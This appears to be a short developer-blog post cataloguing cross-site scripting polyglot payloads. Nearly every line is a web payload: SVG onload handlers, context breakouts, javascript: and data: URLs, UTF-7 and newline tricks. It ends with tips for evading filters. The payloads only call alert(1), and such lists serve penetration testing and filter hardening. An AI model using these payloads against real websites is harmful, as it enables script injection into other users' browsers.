Polyglot payloads leverage multiple encoding, injection, and obfuscation techniques to bypass filters, confuse parsers, and trigger execution across different contexts like HTML, JavaScript, CSS, JSON, etc.
-Merging Comment Styles
Polyglots often confuse parsers by merging different comment styles:
JavaScript: //, /* */
HTML: <!-- -->
<!--<script>/*--><svg onload=alert(1)/*</script>-->
-Using Encoded Entities
Bypassing filters using HTML or URL encoding:
HTML: <, >, "
URL: %3C, %3E, %22
<script>alert(1)</script>
-Multiple Language Contexts
Polyglot payloads work across multiple languages like HTML, JavaScript, CSS.
"><svg onload=alert(1) style="background:url(javascript:alert(1))"><!--
-Breaking Out of Contexts
Escape from current contexts like textarea, script, or style.
</textarea><svg onload=alert(1)>
-Abusing HTML5 Elements
Using modern elements like , , or .
<svg onload=alert(1)></svg>
<iframe srcdoc="<svg onload=alert(1)>"></iframe>
<math><mtext><script>alert(1)</script></mtext></math>
-Contextual Event Handlers
Inject event handlers into HTML tags like onload, onmouseover.
<div class="x" onmouseover="alert(1)">
-Combining HTML, JavaScript, and CSS
Mixing contexts of HTML, CSS, and JavaScript.
</style><script>alert(1)</script><style>
-Utilizing SVG and XML Features
SVG allows injection via JavaScript URIs and other XML-based features.
<svg><image href="javascript:alert(1)"></svg>
-Protocol Confusion (Data URLs, JavaScript URLs)
Use javascript: or data: URLs for payload delivery.
<a href="javascript:alert(1)">Click me</a>
<iframe src="data:text/html;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+"></iframe>
-Breaking with Newline Characters
Using newlines \n or carriage returns \r to bypass filters.
"onmouseover=\nalert(1)//"
-Polyglot Structures
Payloads that work across multiple languages like CSS and JavaScript.
*/ alert(1) /*
-UTF-7 Encoding
Using less common encodings like UTF-7.
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
-Using HTML5 Injection Vectors
Use modern HTML5 vectors like srcdoc, formaction, or sandbox.
<iframe srcdoc="<script>alert(1)</script>"></iframe>
-Multiple Closings & Layering
Close different tags to break out of nested contexts.
</textarea></script></iframe><svg onload=alert(1)>
Best Practices for Polyglot Payloads
Diversify Attack Vectors: Use multiple elements like , , <script>.<br>
Encoding: Use HTML or URL encoding to bypass filters.<br>
Event Handlers: Combine with event handlers like onmouseover, onload.<br>
Context Escaping: Focus on breaking out of strings, attributes, or tags.<br>
Minimize Payload Length: Keep payloads short to bypass length restrictions.<br>
These techniques show how polyglot payloads can bypass modern filters by using multiple languages and contexts.</p>
Top comments (0)